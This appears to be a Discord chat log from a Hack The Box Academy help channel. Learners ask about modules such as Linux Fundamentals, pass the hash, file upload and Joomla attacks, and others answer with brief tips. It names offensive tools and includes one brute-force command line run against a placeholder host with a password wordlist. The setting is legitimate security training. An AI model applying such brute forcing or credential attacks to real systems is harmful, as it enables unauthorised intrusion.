thats a cap

not like they know if it's the actual truth ¯_(ツ)_/¯

hey guys i wrote uname -a in parrot terminal

and got something which wrote dynamic

what will the answer of the question

Based on the commands you executed, what is likely to be the operating system flavor of this instance? (case-sensitive)

what does this even mean

read the section and answer it yourself

google

ok

i have to write the cmd line the the terminal isn't it

also pretty sure you're meant to ssh to a target for this section

what is ssh

a connection protocol

you got a lot to learn

again a lot of your questions can be Googled

ask google before you ask here

btw the instruction did not told me to do that

is just said write uname -a in base terminal

intro to linux?

marcie did lol

nah

hmmm

well "linux fundamentals" i should say

ok

but i did not got that

if you're gonna request help in here: you're gonna have to tell us the module and section name

otherwise we can't effectively figure out what you're trying to communicate

it somewhat bridges language barriers if we read the question you're stuck on

Academy modules are broken into sections; each section contains text and usually some questions

the questions will tell you what it wants and generally instruct you to Authenticate in some way/shape/form to a target with given or discovered credentials

if you're on the linux fundamentals module; and on the System Information section - there is a small bit that talks about SSH

it is HIGHLY advised to read the WHOLE section and module before trying to ask questions

as often what you just asked is covered

@jolly jackal try somethin like this

MODULE: ATTACKING COMMON SERVICES
SECTION: RDP

Question: I'm experiencing difficulty connecting to the RDP service using xfreerdp. The connection seems to fail whenever I click on a single file. I've also attempted to use the web-pawn-box as an alternative, but unfortunately, the connection continues to fail. Is this behavior expected, or am I encountering an unusual issue?

this is an unusual issue

btw. this is a legit question hahahah, is it expected behavior that the rdp connection failes? :-DDD

but also it's just pwnbox not pawnbox

just provide link to the section + what you have done

Hi i was quite new here and to all of this but i hope someone could help me with the following problem?
I am trying out the Sequel in Tier 1.
I can ping the ip but nmap isn't returning anything when using nmap -sC -sV {target_ip} it just keeps endlessly running.
I have already tried to reconnect vpn and also reset the box but still no luck.

i disagree with that' i'd rather have the module/section name than just the link - but that's also partially due to how i have my notes written

run the command again and add -v for verbose mode, so you can track what nmap is currently doing

you can also press the 'space bar' to see the current progress

@nova nest thanks i'll try to see if that helps figuring out what is going on.

Unfortunately, it may be normal for the nmap scan to take longer than is usual with some machines. There can be various reasons for this.

wrong channel btw: #starting-point is where you wanna go for this question

ah ok thanks

is there an option reset the progress of the module

Hi in Password attacks - pass the hash (pth) - Academy

DC01 What does it represent according to my understanding it's mapped to an IP of the instance running Julio/David, is it correct!?

And MS01 is mapped to the administrator which we gain access via Hash

So while listing the dir \DC01\david

It's equivalent to \(ip-of-david)(share name)

Is this correct?!

DC01/MS01 or whatever hostname represent an IP of a machine, it's not related to any specific user

a user might have certain rights on different machines but a machine is just that, it's not a user

DC stands for domain controller

i dont understand how to work with the vpm files and its driving me crazy(got it working)

Got it! Thanks a lot!

Anyone else working through the Web Proxy module dislike ZAP as much as I do?

Burp is just more intuitive imo.

ZAP feels so discount it's not even funny.

Any hints for finding the upload location in Skill Asssesment - File Upload Attacks?

Haven't made it to the skills assessment yet. I just finished Zap Fuzzer. I found the right md5 hash, and then closed out zap and used burp repeater to get the flag lol.

https://tenor.com/view/facepalm-really-stressed-mad-angry-gif-16109475

lol you're talking about a different module

I'm an idiot dude, as I was.

On Attacking Enterprise Network
Web Enumeration & Exploitation
Question: Exploit the WordPress instance and find a flag in the web root. Submit the flag value as your answer (flag format: HTB{}).

I found the valid user name as password as per section explains, but when try to login say error 502

Can anyone help???

The section itself explains to do this way

i am a beginner to 'hacking'. where should i start

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

nah it's aight lol but yeah I m talking about aa diff module lol

hello can I dm you about that I'm stuck on this one

No

ok

spoiler the aen module, most people want to do it blind

also, treat it as a mock test, don't ask for help unless you're really out of ideas

anyone understand why i get this issue?

python3 joomla-brute.py -u http://IP/ -U users.txt -w tools/Hacker-Toolset/Wordlists/passwords/xato-net-10-million-passwords-100000.txt 
 
Repsonse: admin:123456

it gives me a false response saying its correct

Hi everyone, I'm on Information Gathering - Web Edition, section Active Subdomain Enumeration. I am having issues with finding the number of A records. I can use dig and nslookup to generate the listing of subdomains and their respective IPs but the number I use to answer the question is incorrect. I was wondering if anyone could point me in the right direction, please?

oh boy

learn OSI model

Learning OSI model won't really teach ssh lmao

if a guy dont know what a protocol is

then he might as well just start from begining and learn what OSi is

will get a better understanding

Eh Protocols existed before OSI and OSI model is more about the layers than actual protocols

Just that certain things exist within a stack

i learned about all that , starting from OSi atleast . was giving advice from my pov

then i dived deeper , into other things

¯_(ツ)_/¯

Hi everyone can someone please tell me what tool i can use to find a user and password for following:

Examine the third target and submit the contents of flag.txt in C:\Users\Administrator\Desktop\ as the answer. ```

I cant find a user and password by using crackmapexec, evil-winrm, and hydra by using the user and mutated passowrd list given in module. Any tip to navigate me in right direction?

Has anyone finished the injection attack skills assessment?